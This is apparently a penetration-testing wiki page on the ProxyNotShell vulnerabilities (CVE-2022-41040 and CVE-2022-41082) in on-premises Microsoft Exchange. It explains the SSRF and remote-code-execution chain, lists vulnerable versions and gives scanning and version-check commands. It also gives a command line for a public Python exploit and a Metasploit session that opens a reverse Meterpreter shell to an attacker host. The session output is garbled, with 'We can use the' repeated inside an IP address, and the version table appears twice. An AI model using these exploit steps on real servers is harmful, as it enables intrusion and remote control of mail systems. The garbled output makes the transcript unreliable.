ProxyNotShell

Chained CVE-2022-41040, CVE-2022-41082

Theory

ProxyNotShell is identified with the following CVEs: CVE-2022–41040 and CVE-2022–41082. The vulnerabilities affect Microsoft Exchange on premises with an Outlook Web App.

CVE-2022-41040 : SSRF This vulnerability allow attackers to send an arbitrary request with a controlled URI and controlled data to an arbitrary backend service with LocalSystem privilege. (Request is very similar to the ProxyShell one)

CVE-2022-41082 : RCE By abusing CVE-2022-41040 authenticated users may exploit CVE-2022-41082 to run arbitrary commands in vulnerable Exchange Servers.

Practice

We can use the proxynotshell_checker.nse nmap script to scan a target

nmap -p80,443 --script="proxynotshell_checker.nse" $IP

443/tcp open  https
    |_proxynotshell_checker: Potentially vulnerable to ProxyNotShell (mitigation not applied).

If we have local access to the target running exchange, we can check it version using the following powershell command:

#Method 1
PS> GCM exsetup |%{$_.Fileversioninfo}

#Method 2
PS> (Get-Command ExSetup.exe).FileVersionInfo.ProductVersion

ProductVersion   FileVersion      FileName                                                                             
--------------   -----------      --------                                                                             
15.02.0858.005   15.2.1118.20   C:\Program Files\Microsoft\Exchange Server\V15\bin\ExSetup.exe

We can now search for the exact Microsoft Exchange product version using this microsoft link. Following versions are vulnerable :

Version	Vulnerable ProductVersion
Exchange 2019 CU12	< 15.2.1118.20
Exchange 2019 CU11	< 15.2.986.36
Exchange 2016 CU23	< 15.1.2507.16
Exchange 2016 CU22	< 15.1.2375.33
Exchange 2013 CU23	< 15.0.1497.32

Version

Vulnerable ProductVersion

Exchange 2019 CU12

< 15.2.1118.20

Exchange 2019 CU11

< 15.2.986.36

Exchange 2016 CU23

< 15.1.2507.16

Exchange 2016 CU22

< 15.1.2375.33

Exchange 2013 CU23

< 15.0.1497.32

All versions before November 8, 2022 are vulnerable

We can use testanull's python script to exploit this vulnerability

# Install dependecies
pip install requests_ntlm2 requests

#Exploit
python poc_aug3.py <host> <username> <password> <command>

A Metasploit module is available to exploit ProxyNotShell

This exploit only support Exchange Server 2019

msf6 > use exploit/windows/http/exchange_proxynotshell_rce

msf6 exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
USERNAME => aliddle
msf6 exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/http/exchange_proxynotshell_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (175686 bytes) to 192.168.159.11
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 1We can use the We can use the We can use theWe can use the92.168.159.11:7290) at 2022-11-18 17:32:18 -0500

meterpreter >

Resources

ProxyShell or ProxyNotShell? Let’s Set The Record Straight - RezilionRezilion

Last updated 1 year ago